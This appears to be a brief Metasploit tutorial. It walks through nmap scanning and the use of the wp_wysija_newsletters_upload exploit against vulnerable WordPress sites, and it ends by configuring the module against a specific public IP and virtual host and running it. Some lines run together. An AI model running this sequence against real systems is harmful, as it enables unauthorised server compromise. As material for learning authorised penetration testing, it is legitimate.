Metasploit
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
WordPress
Identify a Remote Host
msf > db_nmap -v -sV 192.168.111.xxx
Scan an Entire Network
This will save the results to the Metasploit database
msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1hostswill list all the hosts found bynmap.hosts -Rwill add them to the list of hosts to exploit.
Searching for a WordPress Vulnerability
msf > search name:wordpress
Use an Exploit
This will select an exploit to use:
msf > use exploit/unix/webapp/wp_wysija_newsletters_uploadThis will show you the attacks that the exploit will take advantage of:
msf exploit(wp_wysija_newsletters_upload) > show payloads
This will show what software and version will be targeted:
msf exploit(wp_wysija_newsletters_upload) > show targetsExploit targets:
Id Name
-- ----
0 wysija-newsletter < 2.6.8Next configure the Exploit
msf exploit(wp_wysija_newsletters_upload) > show optionsModule options (exploit/unix/webapp/wp_wysija_newsletter_upload):
Name Current Settings Required Description
---- ---------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST no The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no The base path to the wordpress application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 wysija-newsletters < 2.6.8Here is where we set all the options:
msf exploit(wp_wysija_newsletters_upload) > set RHOST 159.203.19.77
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.lifeRun the Exploit
msf exploit(wp_wysija_newsletters_upload) > exploitLast updated